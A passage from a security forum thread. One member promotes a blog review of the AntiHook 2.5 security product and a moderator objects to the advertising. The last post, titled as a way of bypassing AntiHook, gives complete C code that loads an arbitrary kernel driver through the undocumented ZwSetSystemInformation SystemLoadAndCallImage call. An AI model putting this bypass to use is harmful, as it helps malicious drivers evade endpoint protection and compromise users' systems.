AntiHook 2.5 Review and more
Results 1 to 4 of 4

Thread: AntiHook 2.5 Review and more

  1. #1

    AntiHook 2.5 Review and more

    Hi guys,

    New Big review for AntiHook 2.5 on my Blog check it out.

    http://securityonthenet.blogspot.com/

    Next on line BufferZone Home, Safe’n’Sec Personal and PervX home,

    Don’t forget the Show down between all Products to declare the best “Painkiller Blog Choose” Award

    Cheers
    _________________
    Painkiller
    ----------------------------------
    Hell yea
    Share on Google+

  2. #2
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,884
    Act now because the first 50 callers will receive one of our "Security for Dummiez" handbooks which you can carry in your backpack.

    Cmon dude. This site isn't an infomercial for your blog.

    --TH13
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
    Share on Google+

  3. #3
    Dude. it's Google ads, after all it's Goggle Bloger ... what can i do ...


    Painkiller
    Share on Google+

  4. #4
    Senior Member
    Join Date
    Jun 2003
    Posts
    188
    By passing AntiHook

    Loading the driver

    #include <windows.h>
    #include <stdio.h>

    typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    #ifdef MIDL_PASS [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;

    #else // MIDL_PASS
    PWSTR Buffer;
    #endif // MIDL_PASS
    } UNICODE_STRING, *PUNICODE_STRING;

    typedef long NTSTATUS;

    #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

    NTSTATUS (__stdcall *ZwSetSystemInformation)(
    IN DWORD SystemInformationClass,
    IN OUT PVOID SystemInformation,
    IN ULONG SystemInformationLength
    );

    VOID (__stdcall *RtlInitUnicodeString)(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
    );

    typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
    {
    UNICODE_STRING ModuleName;
    } SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;

    #define SystemLoadAndCallImage 38

    int main(void)

    {

    SYSTEM_LOAD_AND_CALL_IMAGE img;

    WCHAR daPath[] = L"\\??\\c:\\some.sys";

    if( !(RtlInitUnicodeString = (void *)
    GetProcAddress( GetModuleHandle("ntdll.dll")
    ,"RtlInitUnicodeString"
    )
    )
    )
    {
    exit(1);
    }

    if(!(ZwSetSystemInformation = (void *)
    GetProcAddress(
    GetModuleHandle("ntdll.dll")
    ,"ZwSetSystemInformation"
    )
    )
    )
    {
    exit(1);
    }

    RtlInitUnicodeString(
    &(img.ModuleName)
    ,daPath
    );

    if(
    NT_SUCCESS(
    ZwSetSystemInformation(
    SystemLoadAndCallImage
    ,&img
    ,sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)
    )
    )
    )
    {
    printf("Loaded.\n");
    }
    else
    {
    printf("Not loaded.\n");
    }
    }
    Share on Google+

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •